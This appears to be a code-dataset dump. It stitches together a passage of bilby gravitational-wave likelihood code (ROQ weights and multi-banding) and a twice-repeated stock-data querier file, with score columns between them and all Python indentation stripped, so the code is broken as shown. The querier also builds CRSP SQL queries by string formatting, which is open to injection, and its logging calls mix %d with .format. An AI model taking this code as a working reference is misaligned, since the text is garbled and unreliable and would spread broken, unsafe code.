for ifo in self.interferometers:
if self.roq_params is not None:
self.perform_roq_params_check(ifo)
# Get scaled ROQ quantities
roq_scaled_minimum_frequency = self.roq_params['flow'] * self.roq_scale_factor
roq_scaled_maximum_frequency = self.roq_params['fhigh'] * self.roq_scale_factor
roq_scaled_segment_length = self.roq_params['seglen'] / self.roq_scale_factor
# Generate frequencies for the ROQ
roq_frequencies = create_frequency_series(
sampling_frequency=roq_scaled_maximum_frequency * 2,
duration=roq_scaled_segment_length)
roq_mask = roq_frequencies >= roq_scaled_minimum_frequency
roq_frequencies = roq_frequencies[roq_mask]
overlap_frequencies, ifo_idxs, roq_idxs = np.intersect1d(
ifo.frequency_array[ifo.frequency_mask], roq_frequencies,
return_indices=True)
else:
overlap_frequencies = ifo.frequency_array[ifo.frequency_mask]
roq_idxs = np.arange(linear_matrix.shape[0], dtype=int)
ifo_idxs = np.arange(sum(ifo.frequency_mask))
if len(ifo_idxs) != len(roq_idxs):
raise ValueError(
"Mismatch between ROQ basis and frequency array for "
"{}".format(ifo.name))
logger.info(
"Building ROQ weights for {} with {} frequencies between {} "
"and {}.".format(
ifo.name, len(overlap_frequencies),
min(overlap_frequencies), max(overlap_frequencies)))
ifft_input[:] *= 0.
self.weights[ifo.name + '_linear'] = \
np.zeros((len(self.weights['time_samples']), linear_matrix.shape[1]), dtype=complex)
data_over_psd = ifo.frequency_domain_strain[ifo.frequency_mask][ifo_idxs] / \
ifo.power_spectral_density_array[ifo.frequency_mask][ifo_idxs]
nonzero_idxs = ifo_idxs + int(ifo.frequency_array[ifo.frequency_mask][0] * self.interferometers.duration)
for i, basis_element in enumerate(linear_matrix[roq_idxs].T):
ifft_input[nonzero_idxs] = data_over_psd * np.conj(basis_element)
self.weights[ifo.name + '_linear'][:, i] = ifft(ifft_input)[start_idx:end_idx + 1]
self.weights[ifo.name + '_linear'] *= 4. * number_of_time_samples / self.interferometers.duration
self.weights[ifo.name + '_quadratic'] = build_roq_weights(
1 /
ifo.power_spectral_density_array[ifo.frequency_mask][ifo_idxs],
quadratic_matrix[roq_idxs].real,
1 / ifo.strain_data.duration)
logger.info("Finished building weights for {}".format(ifo.name))
if pyfftw is not None:
pyfftw.forget_wisdom()
def save_weights(self, filename, format='npz'):
if format not in filename:
filename += "." + format
logger.info("Saving ROQ weights to {}".format(filename))
if format == 'json':
with open(filename, 'w') as file:
json.dump(self.weights, file, indent=2, cls=BilbyJsonEncoder)
elif format == 'npz':
np.savez(filename, **self.weights)
@staticmethod
def load_weights(filename, format=None):
if format is None:
format = filename.split(".")[-1]
if format not in ["json", "npz"]:
raise IOError("Format {} not recognized.".format(format))
logger.info("Loading ROQ weights from {}".format(filename))
if format == "json":
with open(filename, 'r') as file:
weights = json.load(file, object_hook=decode_bilby_json)
elif format == "npz":
# Wrap in dict to load data into memory
weights = dict(np.load(filename))
return weights
def _get_time_resolution(self):
"""
This method estimates the time resolution given the optimal SNR of the
signal in the detector. This is then used when constructing the weights
for the ROQ.
A minimum resolution is set by assuming the SNR in each detector is at
least 10. When the SNR is not available the SNR is assumed to be 30 in
each detector.
Returns
=======
delta_t: float
Time resolution
"""
def calc_fhigh(freq, psd, scaling=20.):
"""
Parameters
==========
freq: array-like
Frequency array
psd: array-like
Power spectral density
scaling: float
SNR dependent scaling factor
Returns
=======
f_high: float
The maximum frequency which must be considered
"""
from scipy.integrate import simps
integrand1 = np.power(freq, -7. / 3) / psd
integral1 = simps(integrand1, freq)
integrand3 = np.power(freq, 2. / 3.) / (psd * integral1)
f_3_bar = simps(integrand3, freq)
f_high = scaling * f_3_bar**(1 / 3)
return f_high
def c_f_scaling(snr):
return (np.pi**2 * snr**2 / 6)**(1 / 3)
inj_snr_sq = 0
for ifo in self.interferometers:
inj_snr_sq += max(10, ifo.meta_data.get('optimal_SNR', 30))**2
psd = ifo.power_spectral_density_array[ifo.frequency_mask]
freq = ifo.frequency_array[ifo.frequency_mask]
fhigh = calc_fhigh(freq, psd, scaling=c_f_scaling(inj_snr_sq**0.5))
delta_t = fhigh**-1
# Apply a safety factor to ensure the time step is short enough
delta_t = delta_t / 5
# duration / delta_t needs to be a power of 2 for IFFT
number_of_time_samples = max(
self.interferometers.duration / delta_t,
self.interferometers.frequency_array[-1] * self.interferometers.duration + 1)
number_of_time_samples = int(2**np.ceil(np.log2(number_of_time_samples)))
delta_t = self.interferometers.duration / number_of_time_samples
logger.info("ROQ time-step = {}".format(delta_t))
return delta_t
def _rescale_signal(self, signal, new_distance):
for kind in ['linear', 'quadratic']:
for mode in signal[kind]:
signal[kind][mode] *= self._ref_dist / new_distance
def get_binary_black_hole_likelihood(interferometers):
""" A wrapper to quickly set up a likelihood for BBH parameter estimation
Parameters
==========
interferometers: {bilby.gw.detector.InterferometerList, list}
A list of `bilby.detector.Interferometer` instances, typically the
output of either `bilby.detector.get_interferometer_with_open_data`
or `bilby.detector.get_interferometer_with_fake_noise_and_injection`
Returns
=======
bilby.GravitationalWaveTransient: The likelihood to pass to `run_sampler`
"""
waveform_generator = WaveformGenerator(
duration=interferometers.duration,
sampling_frequency=interferometers.sampling_frequency,
frequency_domain_source_model=lal_binary_black_hole,
waveform_arguments={'waveform_approximant': 'IMRPhenomPv2',
'reference_frequency': 50})
return GravitationalWaveTransient(interferometers, waveform_generator)
class BilbyROQParamsRangeError(Exception):
pass
class MBGravitationalWaveTransient(GravitationalWaveTransient):
"""A multi-banded likelihood object
This uses the method described in <NAME>, 2021, arXiv: 2104.07813.
Parameters
----------
interferometers: list, bilby.gw.detector.InterferometerList
A list of `bilby.detector.Interferometer` instances - contains the detector data and power spectral densities
waveform_generator: `bilby.waveform_generator.WaveformGenerator`
An object which computes the frequency-domain strain of the signal, given some set of parameters
reference_chirp_mass: float
A reference chirp mass for determining the frequency banding
highest_mode: int, optional
The maximum magnetic number of gravitational-wave moments. Default is 2
linear_interpolation: bool, optional
If True, the linear-interpolation method is used for the computation of (h, h). If False, the IFFT-FFT method
is used. Default is True.
accuracy_factor: float, optional
A parameter to determine the accuracy of multi-banding. The larger this factor is, the more accurate the
approximation is. This corresponds to L in the paper. Default is 5.
time_offset: float, optional
(end time of data) - (maximum arrival time). If None, it is inferred from the prior of geocent time.
delta_f_end: float, optional
The frequency scale with which waveforms at the high-frequency end are smoothed. If None, it is determined from
the prior of geocent time.
maximum_banding_frequency: float, optional
A maximum frequency for multi-banding. If specified, the low-frequency limit of a band does not exceed it.
minimum_banding_duration: float, optional
A minimum duration for multi-banding. If specified, the duration of a band is not smaller than it.
distance_marginalization: bool, optional
If true, marginalize over distance in the likelihood. This uses a look up table calculated at run time. The
distance prior is set to be a delta function at the minimum distance allowed in the prior being marginalised
over.
phase_marginalization: bool, optional
If true, marginalize over phase in the likelihood. This is done analytically using a Bessel function. The phase
prior is set to be a delta function at phase=0.
priors: dict, bilby.prior.PriorDict
A dictionary of priors containing at least the geocent_time prior
distance_marginalization_lookup_table: (dict, str), optional
If a dict, dictionary containing the lookup_table, distance_array, (distance) prior_array, and
reference_distance used to construct the table. If a string the name of a file containing these quantities. The
lookup table is stored after construction in either the provided string or a default location:
'.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
Definition of the reference frame for the sky location.
- "sky": sample in RA/dec, this is the default
- e.g., "H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"]):
sample in azimuth and zenith, `azimuth` and `zenith` defined in the frame where the z-axis is aligned the the
vector connecting H1 and L1.
time_reference: str, optional
Name of the reference for the sampled time parameter.
- "geocent"/"geocenter": sample in the time at the Earth's center, this is the default
- e.g., "H1": sample in the time of arrival at H1
Returns
-------
Likelihood: `bilby.core.likelihood.Likelihood`
A likelihood object, able to compute the likelihood of the data given some model parameters
"""
def __init__(
self, interferometers, waveform_generator, reference_chirp_mass, highest_mode=2, linear_interpolation=True,
accuracy_factor=5, time_offset=None, delta_f_end=None, maximum_banding_frequency=None,
minimum_banding_duration=0., distance_marginalization=False, phase_marginalization=False, priors=None,
distance_marginalization_lookup_table=None, reference_frame="sky", time_reference="geocenter"
):
super(MBGravitationalWaveTransient, self).__init__(
interferometers=interferometers, waveform_generator=waveform_generator, priors=priors,
distance_marginalization=distance_marginalization, phase_marginalization=phase_marginalization,
time_marginalization=False, distance_marginalization_lookup_table=distance_marginalization_lookup_table,
jitter_time=False, reference_frame=reference_frame, time_reference=time_reference
)
self.reference_chirp_mass = reference_chirp_mass
self.highest_mode = highest_mode
self.linear_interpolation = linear_interpolation
self.accuracy_factor = accuracy_factor
self.time_offset = time_offset
self.delta_f_end = delta_f_end
self.minimum_frequency = np.min([i.minimum_frequency for i in self.interferometers])
self.maximum_frequency = np.max([i.maximum_frequency for i in self.interferometers])
self.maximum_banding_frequency = maximum_banding_frequency
self.minimum_banding_duration = minimum_banding_duration
self.setup_multibanding()
@property
def reference_chirp_mass(self):
return self._reference_chirp_mass
@property
def reference_chirp_mass_in_second(self):
return gravitational_constant * self._reference_chirp_mass * solar_mass / speed_of_light**3.
@reference_chirp_mass.setter
def reference_chirp_mass(self, reference_chirp_mass):
if isinstance(reference_chirp_mass, int) or isinstance(reference_chirp_mass, float):
self._reference_chirp_mass = reference_chirp_mass
else:
raise TypeError("reference_chirp_mass must be a number")
@property
def highest_mode(self):
return self._highest_mode
@highest_mode.setter
def highest_mode(self, highest_mode):
if isinstance(highest_mode, int) or isinstance(highest_mode, float):
self._highest_mode = highest_mode
else:
raise TypeError("highest_mode must be a number")
@property
def linear_interpolation(self):
return self._linear_interpolation
@linear_interpolation.setter
def linear_interpolation(self, linear_interpolation):
if isinstance(linear_interpolation, bool):
self._linear_interpolation = linear_interpolation
else:
raise TypeError("linear_interpolation must be a bool")
@property
def accuracy_factor(self):
return self._accuracy_factor
@accuracy_factor.setter
def accuracy_factor(self, accuracy_factor):
if isinstance(accuracy_factor, int) or isinstance(accuracy_factor, float):
self._accuracy_factor = accuracy_factor
else:
raise TypeError("accuracy_factor must be a number")
@property
def time_offset(self):
return self._time_offset
@time_offset.setter
def time_offset(self, time_offset):
"""
This sets the time offset assumed when frequency bands are constructed. The default value is (the
maximum offset of geocent time in the prior range) + (light-traveling time of the Earth). If the
prior does not contain 'geocent_time', 2.12 seconds is used. It is calculated assuming that the
maximum offset of geocent time is 2.1 seconds, which is the value for the standard prior used by
LIGO-Virgo-KAGRA.
"""
time_parameter = self.time_reference + "_time"
if time_parameter == "geocent_time":
safety = radius_of_earth / speed_of_light
else:
safety = 2 * radius_of_earth / speed_of_light
if time_offset is not None:
if isinstance(time_offset, int) or isinstance(time_offset, float):
self._time_offset = time_offset
else:
raise TypeError("time_offset must be a number")
elif self.priors is not None and time_parameter in self.priors:
self._time_offset = (
self.interferometers.start_time + self.interferometers.duration
- self.priors[time_parameter].minimum + safety
)
else:
self._time_offset = 2.12
logger.warning("time offset can not be inferred. Use the standard time offset of {} seconds.".format(
self._time_offset))
@property
def delta_f_end(self):
return self._delta_f_end
@delta_f_end.setter
def delta_f_end(self, delta_f_end):
"""
This sets the frequency scale of tapering the high-frequency end of waveform, to avoid the issues of
abrupt termination of waveform described in Sec. 2. F of arXiv: 2104.07813. This needs to be much
larger than the inverse of the minimum time offset, and the default value is 100 times of that. If
the prior does not contain 'geocent_time' and the minimum time offset can not be computed, 53Hz is
used. It is computed assuming that the minimum offset of geocent time is 1.9 seconds, which is the
value for the standard prior used by LIGO-Virgo-KAGRA.
"""
time_parameter = self.time_reference + "_time"
if time_parameter == "geocent_time":
safety = radius_of_earth / speed_of_light
else:
safety = 2 * radius_of_earth / speed_of_light
if delta_f_end is not None:
if isinstance(delta_f_end, int) or isinstance(delta_f_end, float):
self._delta_f_end = delta_f_end
else:
raise TypeError("delta_f_end must be a number")
elif self.priors is not None and time_parameter in self.priors:
self._delta_f_end = 100 / (
self.interferometers.start_time + self.interferometers.duration
- self.priors[time_parameter].maximum - safety
)
else:
self._delta_f_end = 53.
logger.warning("delta_f_end can not be inferred. Use the standard delta_f_end of {} Hz.".format(
self._delta_f_end))
@property
def maximum_banding_frequency(self):
return self._maximum_banding_frequency
@maximum_banding_frequency.setter
def maximum_banding_frequency(self, maximum_banding_frequency):
"""
This sets the upper limit on a starting frequency of a band. The default value is the frequency at
which f - 1 / \sqrt(- d\tau / df) starts to decrease, because the bisection search of the starting
frequency does not work from that frequency. The stationary phase approximation is not valid at such
a high frequency, which can break down the approximation. It is calculated from the 0PN formula of
time-to-merger \tau(f). The user-specified frequency is used if it is lower than that frequency.
"""
fmax_tmp = (
(15 / 968)**(3 / 5) * (self.highest_mode / (2 * np.pi))**(8 / 5)
/ self.reference_chirp_mass_in_second
)
if maximum_banding_frequency is not None:
if isinstance(maximum_banding_frequency, int) or isinstance(maximum_banding_frequency, float):
if maximum_banding_frequency < fmax_tmp:
fmax_tmp = maximum_banding_frequency
else:
logger.warning("The input maximum_banding_frequency is too large."
"It is set to be {} Hz.".format(fmax_tmp))
else:
raise TypeError("maximum_banding_frequency must be a number")
self._maximum_banding_frequency = fmax_tmp
@property
def minimum_banding_duration(self):
return self._minimum_banding_duration
@minimum_banding_duration.setter
def minimum_banding_duration(self, minimum_banding_duration):
if isinstance(minimum_banding_duration, int) or isinstance(minimum_banding_duration, float):
self._minimum_banding_duration = minimum_banding_duration
else:
raise TypeError("minimum_banding_duration must be a number")
def setup_multibanding(self):
"""Set up frequency bands and coefficients needed for likelihood evaluations"""
self._setup_frequency_bands()
self._setup_integers()
self._setup_waveform_frequency_points()
self._setup_linear_coefficients()
if self.linear_interpolation:
self._setup_quadratic_coefficients_linear_interp()
else:
self._setup_quadratic_coefficients_ifft_fft()
def _tau(self, f):
"""Compute time-to-merger from the input frequency. This uses the 0PN formula.
Parameters
----------
f: float
input frequency
Returns
-------
tau: float
time-to-merger
"""
f_22 = 2. * f / self.highest_mode
return 5. / 256. * self.reference_chirp_mass_in_second * \
(np.pi * self.reference_chirp_mass_in_second * f_22)**(-8. / 3.)
def _dtaudf(self, f):
"""Compute the derivative of time-to-merger with respect to a starting frequency. This uses the 0PN formula.
Parameters
----------
f: float
input frequency
Returns
-------
dtaudf: float
derivative of time-to-merger
"""
f_22 = 2. * f / self.highest_mode
return -5. / 96. * self.reference_chirp_mass_in_second * \
(np.pi * self.reference_chirp_mass_in_second * f_22)**(-8. / 3.) / f
def _find_starting_frequency(self, duration, fnow):
"""Find the starting frequency of the next band satisfying (10) and
(51) of arXiv: 2104.07813.
Parameters
----------
duration: float
duration of the next band
fnow: float
starting frequency of the current band
Returns
-------
fnext: float or None
starting frequency of the next band. None if a frequency satisfying the conditions does not exist.
dfnext: float or None
frequency scale with which waveforms are smoothed. None if a frequency satisfying the conditions does not
exist.
"""
def _is_above_fnext(f):
"This function returns True if f > fnext"
cond1 = duration - self.time_offset - self._tau(f) - \
self.accuracy_factor * np.sqrt(-self._dtaudf(f)) > 0.
cond2 = f - 1. / np.sqrt(-self._dtaudf(f)) - fnow > 0.
return cond1 and cond2
# Bisection search for fnext
fmin, fmax = fnow, self.maximum_banding_frequency
if not _is_above_fnext(fmax):
return None, None
while fmax - fmin > 1e-2 / duration:
f = (fmin + fmax) / 2.
if _is_above_fnext(f):
fmax = f
else:
fmin = f
return f, 1. / np.sqrt(-self._dtaudf(f))
def _setup_frequency_bands(self):
"""Set up frequency bands. The durations of bands geometrically decrease T, T/2. T/4, ..., where T is the
original duration. This sets the following instance variables.
durations: durations of bands (T^(b) in the paper)
fb_dfb: the list of tuples, which contain starting frequencies (f^(b) in the paper) and frequency scales for
smoothing waveforms (\Delta f^(b) in the paper) of bands
"""
self.durations = [self.interferometers.duration]
self.fb_dfb = [(self.minimum_frequency, 0.)]
dnext = self.interferometers.duration / 2
while dnext > max(self.time_offset, self.minimum_banding_duration):
fnow, _ = self.fb_dfb[-1]
fnext, dfnext = self._find_starting_frequency(dnext, fnow)
if fnext is not None and fnext < min(self.maximum_frequency, self.maximum_banding_frequency):
self.durations.append(dnext)
self.fb_dfb.append((fnext, dfnext))
dnext /= 2
else:
break
self.fb_dfb.append((self.maximum_frequency + self.delta_f_end, self.delta_f_end))
logger.info("The total frequency range is divided into {} bands with frequency intervals of {}.".format(
len(self.durations), ", ".join(["1/{} Hz".format(d) for d in self.durations])))
def _setup_integers(self):
"""Set up integers needed for likelihood evaluations. This sets the following instance variables.
Nbs: the numbers of samples of downsampled data (N^(b) in the paper)
Mbs: the numbers of samples of shortened data (M^(b) in the paper)
Ks_Ke: start and end frequency indices of bands (K^(b)_s and K^(b)_e in the paper)
"""
self.Nbs = []
self.Mbs = []
self.Ks_Ke = []
for b in range(len(self.durations)):
dnow = self.durations[b]
fnow, dfnow = self.fb_dfb[b]
fnext, _ = self.fb_dfb[b + 1]
Nb = max(round_up_to_power_of_two(2. * (fnext * self.interferometers.duration + 1.)), 2**b)
self.Nbs.append(Nb)
self.Mbs.append(Nb // 2**b)
self.Ks_Ke.append((math.ceil((fnow - dfnow) * dnow), math.floor(fnext * dnow)))
def _setup_waveform_frequency_points(self):
"""Set up frequency points where waveforms are evaluated. Frequency points are reordered because some waveform
models raise an error if the input frequencies are not increasing. This adds frequency_points into the
waveform_arguments of waveform_generator. This sets the following instance variables.
banded_frequency_points: ndarray of total banded frequency points
start_end_idxs: list of tuples containing start and end indices of each band
unique_to_original_frequencies: indices converting unique frequency
points into the original duplicated banded frequencies
"""
self.banded_frequency_points = np.array([])
self.start_end_idxs = []
start_idx = 0
for i in range(len(self.fb_dfb) - 1):
d = self.durations[i]
Ks, Ke = self.Ks_Ke[i]
self.banded_frequency_points = np.append(self.banded_frequency_points, np.arange(Ks, Ke + 1) / d)
end_idx = start_idx + Ke - Ks
self.start_end_idxs.append((start_idx, end_idx))
start_idx = end_idx + 1
unique_frequencies, idxs = np.unique(self.banded_frequency_points, return_inverse=True)
self.waveform_generator.waveform_arguments['frequencies'] = unique_frequencies
self.unique_to_original_frequencies = idxs
logger.info("The number of frequency points where waveforms are evaluated is {}.".format(
len(unique_frequencies)))
logger.info("The speed-up gain of multi-banding is {}.".format(
(self.maximum_frequency - self.minimum_frequency) * self.interferometers.duration /
len(unique_frequencies)))
def _window(self, f, b):
"""Compute window function in the b-th band
Parameters
----------
f: float or ndarray
frequency at which the window function is computed
b: int
Returns
-------
window: float
window function at f
"""
fnow, dfnow = self.fb_dfb[b]
fnext, dfnext = self.fb_dfb[b + 1]
@np.vectorize
def _vectorized_window(f):
if fnow - dfnow < f < fnow:
return (1. + np.cos(np.pi * (f - fnow) / dfnow)) / 2.
elif fnow <= f <= fnext - dfnext:
return 1.
elif fnext - dfnext < f < fnext:
return (1. - np.cos(np.pi * (f - fnext) / dfnext)) / 2.
else:
return 0.
return _vectorized_window(f)
def _setup_linear_coefficients(self):
"""Set up coefficients by which waveforms are multiplied to compute (d, h)"""
self.linear_coeffs = dict((ifo.name, np.array([])) for ifo in self.interferometers)
N = self.Nbs[-1]
for ifo in self.interferometers:
logger.info("Pre-computing linear coefficients for {}".format(ifo.name))
fddata = np.zeros(N // 2 + 1, dtype=complex)
fddata[:len(ifo.frequency_domain_strain)][ifo.frequency_mask] += \
ifo.frequency_domain_strain[ifo.frequency_mask] / ifo.power_spectral_density_array[ifo.frequency_mask]
for b in range(len(self.fb_dfb) - 1):
start_idx, end_idx = self.start_end_idxs[b]
windows = self._window(self.banded_frequency_points[start_idx:end_idx + 1], b)
fddata_in_ith_band = np.copy(fddata[:int(self.Nbs[b] / 2 + 1)])
fddata_in_ith_band[-1] = 0. # zeroing data at the Nyquist frequency
tddata = np.fft.irfft(fddata_in_ith_band)[-self.Mbs[b]:]
Ks, Ke = self.Ks_Ke[b]
fddata_in_ith_band = np.fft.rfft(tddata)[Ks:Ke + 1]
self.linear_coeffs[ifo.name] = np.append(
self.linear_coeffs[ifo.name], (4. / self.durations[b]) * windows * np.conj(fddata_in_ith_band))
def _setup_quadratic_coefficients_linear_interp(self):
"""Set up coefficients by which the squares of waveforms are multiplied to compute (h, h) for the
linear-interpolation algorithm"""
logger.info("Linear-interpolation algorithm is used for (h, h).")
self.quadratic_coeffs = dict((ifo.name, np.array([])) for ifo in self.interferometers)
N = self.Nbs[-1]
for ifo in self.interferometers:
logger.info("Pre-computing quadratic coefficients for {}".format(ifo.name))
full_frequencies = np.arange(N // 2 + 1) / ifo.duration
full_inv_psds = np.zeros(N // 2 + 1)
full_inv_psds[:len(ifo.power_spectral_density_array)][ifo.frequency_mask] = \
1. / ifo.power_spectral_density_array[ifo.frequency_mask]
for i in range(len(self.fb_dfb) - 1):
start_idx, end_idx = self.start_end_idxs[i]
banded_frequencies = self.banded_frequency_points[start_idx:end_idx + 1]
coeffs = np.zeros(len(banded_frequencies))
for k in range(len(coeffs) - 1):
if k == 0:
start_idx_in_sum = 0
else:
start_idx_in_sum = math.ceil(ifo.duration * banded_frequencies[k])
if k == len(coeffs) - 2:
end_idx_in_sum = len(full_frequencies) - 1
else:
end_idx_in_sum = math.ceil(ifo.duration * banded_frequencies[k + 1]) - 1
window_over_psd = full_inv_psds[start_idx_in_sum:end_idx_in_sum + 1] \
* self._window(full_frequencies[start_idx_in_sum:end_idx_in_sum + 1], i)
frequencies_in_sum = full_frequencies[start_idx_in_sum:end_idx_in_sum + 1]
coeffs[k] += 4. * self.durations[i] / ifo.duration * np.sum(
(banded_frequencies[k + 1] - frequencies_in_sum) * window_over_psd)
coeffs[k + 1] += 4. * self.durations[i] / ifo.duration \
* np.sum((frequencies_in_sum - banded_frequencies[k]) * window_over_psd)
self.quadratic_coeffs[ifo.name] = np.append(self.quadratic_coeffs[ifo.name], coeffs)
def _setup_quadratic_coefficients_ifft_fft(self):
"""Set up coefficients needed for the IFFT-FFT algorithm to compute (h, h)"""
logger.info("IFFT-FFT algorithm is used for (h, h).")
N = self.Nbs[-1]
# variables defined below correspond to \hat{N}^(b), \hat{T}^(b), \tilde{I}^(b)_{c, k}, h^(b)_{c, m} and
# \sqrt{w^(b)(f^(b)_k)} \tilde{h}(f^(b)_k) in the paper
Nhatbs = [min(2 * Mb, Nb) for Mb, Nb in zip(self.Mbs, self.Nbs)]
self.Tbhats = [self.interferometers.duration * Nbhat / Nb for Nb, Nbhat in zip(self.Nbs, Nhatbs)]
self.Ibcs = dict((ifo.name, []) for ifo in self.interferometers)
self.hbcs = dict((ifo.name, []) for ifo in self.interferometers)
self.wths = dict((ifo.name, []) for ifo in self.interferometers)
for ifo in self.interferometers:
logger.info("Pre-computing quadratic coefficients for {}".format(ifo.name))
full_inv_psds = np.zeros(N // 2 + 1)
full_inv_psds[:len(ifo.power_spectral_density_array)][ifo.frequency_mask] = 1. / \
ifo.power_spectral_density_array[ifo.frequency_mask]
for b in range(len(self.fb_dfb) - 1):
Imb = np.fft.irfft(full_inv_psds[:self.Nbs[b] // 2 + 1])
half_length = Nhatbs[b] // 2
Imbc = np.append(Imb[:half_length + 1], Imb[-(Nhatbs[b] - half_length - 1):])
self.Ibcs[ifo.name].append(np.fft.rfft(Imbc))
# Allocate arrays for IFFT-FFT operations
self.hbcs[ifo.name].append(np.zeros(Nhatbs[b]))
self.wths[ifo.name].append(np.zeros(self.Mbs[b] // 2 + 1, dtype=complex))
# precompute windows and their squares
self.windows = np.array([])
self.square_root_windows = np.array([])
for b in range(len(self.fb_dfb) - 1):
start, end = self.start_end_idxs[b]
ws = self._window(self.banded_frequency_points[start:end + 1], b)
self.windows = np.append(self.windows, ws)
self.square_root_windows = np.append(self.square_root_windows, np.sqrt(ws))
def calculate_snrs(self, waveform_polarizations, interferometer):
"""
Compute the snrs for multi-banding
Parameters
----------
waveform_polarizations: waveform
interferometer: bilby.gw.detector.Interferometer
Returns
-------
snrs: named tuple of snrs
"""
strain = np.zeros(len(self.banded_frequency_points), dtype=complex)
for mode in waveform_polarizations:
response = interferometer.antenna_response(
self.parameters['ra'], self.parameters['dec'],
self.parameters['geocent_time'], self.parameters['psi'],
mode
)
strain += waveform_polarizations[mode][self.unique_to_original_frequencies] * response
dt = interferometer.time_delay_from_geocenter(
self.parameters['ra'], self.parameters['dec'],
self.parameters['geocent_time'])
dt_geocent = self.parameters['geocent_time'] - interferometer.strain_data.start_time
ifo_time = dt_geocent + dt
calib_factor = interferometer.calibration_model.get_calibration_factor(
self.banded_frequency_points, prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
strain *= np.exp(-1j * 2. * np.pi * self.banded_frequency_points * ifo_time)
strain *= np.conjugate(calib_factor)
d_inner_h = np.dot(strain, self.linear_coeffs[interferometer.name])
if self.linear_interpolation:
optimal_snr_squared = np.vdot(
np.real(strain * np.conjugate(strain)),
self.quadratic_coeffs[interferometer.name]
)
else:
optimal_snr_squared = 0.
for b in range(len(self.fb_dfb) - 1):
Ks, Ke = self.Ks_Ke[b]
start_idx, end_idx = self.start_end_idxs[b]
Mb = self.Mbs[b]
if b == 0:
optimal_snr_squared += (4. / self.interferometers.duration) * np.vdot(
np.real(strain[start_idx:end_idx + 1] * np.conjugate(strain[start_idx:end_idx + 1])),
interferometer.frequency_mask[Ks:Ke + 1] * self.windows[start_idx:end_idx + 1]
/ interferometer.power_spectral_density_array[Ks:Ke + 1])
else:
self.wths[interferometer.name][b][Ks:Ke + 1] = self.square_root_windows[start_idx:end_idx + 1] \
* strain[start_idx:end_idx + 1]
self.hbcs[interferometer.name][b][-Mb:] = np.fft.irfft(self.wths[interferometer.name][b])
thbc = np.fft.rfft(self.hbcs[interferometer.name][b])
optimal_snr_squared += (4. / self.Tbhats[b]) * np.vdot(
np.real(thbc * np.conjugate(thbc)), self.Ibcs[interferometer.name][b])
complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
return self._CalculatedSNRs(
d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
complex_matched_filter_snr=complex_matched_filter_snr,
d_inner_h_squared_tc_array=None,
d_inner_h_array=None,
optimal_snr_squared_array=None)
def _rescale_signal(self, signal, new_distance):
for mode in signal:
signal[mode] *= self._ref_dist / new_distance | 0.844537 | 0.434101 |
import pandas as pd
import yfinance as yf
import logging
import wrds
TABLE_NUM = 0
STOCK_COLUMN = "Symbol"
class DataQuerierYF:
def __init__ (self, cfg, load_on_init=True, save=True, **kwargs):
self.cfg = cfg
self.company_list = pd.read_html(self.cfg.link)[TABLE_NUM][STOCK_COLUMN].tolist()
logging.info("Attempting load for %d stocks from %s".format([len(self.company_list), self.cfg.link]))
self.from_params = len(kwargs)
self.save_data = save
self.kwargs = kwargs
if (load_on_init):
self()
def __call__(self):
self.__get_tickers(self.kwargs)
if(self.save_data):
self.__save()
logging.info("Loaded %d stocks from %s".format([len(self.stock_hist.columns), self.cfg.link]))
return self.stock_hist
def __save(self):
self.stock_hist.to_parquet(self.cfg.data_path)
def __get_tickers(self, kwargs):
if (self.from_params):
self.stock_hist = yf.download(
tickers = self.company_list,
**kwargs
)
else:
self.stock_hist = yf.download(
tickers = self.company_list,
**self.cfg.params
)
return self.stock_hist
class SharesOutStandingQuerier:
def __init__ (self, company_permcos_name, dates, first_connection=False, username="ghandri", **kwargs):
self.company_permcos_name = pd.DataFrame({"ticker": company_permcos_name})
self.dates = dates
self.db=wrds.Connection(wrds_username=username)
if (first_connection):
self.db.create_pgpass_file()
self.__get_permcos()
print(self.permcos)
self.__query_company()
self.db.close()
def __get_permcos(self):
query_res = self.db.raw_sql("select permco , ticker, namedt, nameenddt,comnam "
"from crsp.stocknames "
"where namedt <'2009-01-01' and nameenddt >'2009-01-01'")
self.permcos = query_res[["permco", "ticker"]].merge(self.company_permcos_name, on="ticker")
def __call__(self):
return
def __query_company(self,):
params= {'permco': tuple(self.permcos["permco"]), 'low': self.dates[0], 'high': self.dates[1]}
self.sharesout =self.db.raw_sql("select date,permco,shrout "
"from crsp.dsf "
"where permco in {permco} "
"and date >= '{low}'"
"and date <= '{high}'".format(**params))
return self.sharesout | data_querier.py | import pandas as pd
import yfinance as yf
import logging
import wrds
TABLE_NUM = 0
STOCK_COLUMN = "Symbol"
class DataQuerierYF:
def __init__ (self, cfg, load_on_init=True, save=True, **kwargs):
self.cfg = cfg
self.company_list = pd.read_html(self.cfg.link)[TABLE_NUM][STOCK_COLUMN].tolist()
logging.info("Attempting load for %d stocks from %s".format([len(self.company_list), self.cfg.link]))
self.from_params = len(kwargs)
self.save_data = save
self.kwargs = kwargs
if (load_on_init):
self()
def __call__(self):
self.__get_tickers(self.kwargs)
if(self.save_data):
self.__save()
logging.info("Loaded %d stocks from %s".format([len(self.stock_hist.columns), self.cfg.link]))
return self.stock_hist
def __save(self):
self.stock_hist.to_parquet(self.cfg.data_path)
def __get_tickers(self, kwargs):
if (self.from_params):
self.stock_hist = yf.download(
tickers = self.company_list,
**kwargs
)
else:
self.stock_hist = yf.download(
tickers = self.company_list,
**self.cfg.params
)
return self.stock_hist
class SharesOutStandingQuerier:
def __init__ (self, company_permcos_name, dates, first_connection=False, username="ghandri", **kwargs):
self.company_permcos_name = pd.DataFrame({"ticker": company_permcos_name})
self.dates = dates
self.db=wrds.Connection(wrds_username=username)
if (first_connection):
self.db.create_pgpass_file()
self.__get_permcos()
print(self.permcos)
self.__query_company()
self.db.close()
def __get_permcos(self):
query_res = self.db.raw_sql("select permco , ticker, namedt, nameenddt,comnam "
"from crsp.stocknames "
"where namedt <'2009-01-01' and nameenddt >'2009-01-01'")
self.permcos = query_res[["permco", "ticker"]].merge(self.company_permcos_name, on="ticker")
def __call__(self):
return
def __query_company(self,):
params= {'permco': tuple(self.permcos["permco"]), 'low': self.dates[0], 'high': self.dates[1]}
self.sharesout =self.db.raw_sql("select date,permco,shrout "
"from crsp.dsf "
"where permco in {permco} "
"and date >= '{low}'"
"and date <= '{high}'".format(**params))
return self.sharesout | 0.240685 | 0.09611 |
import json
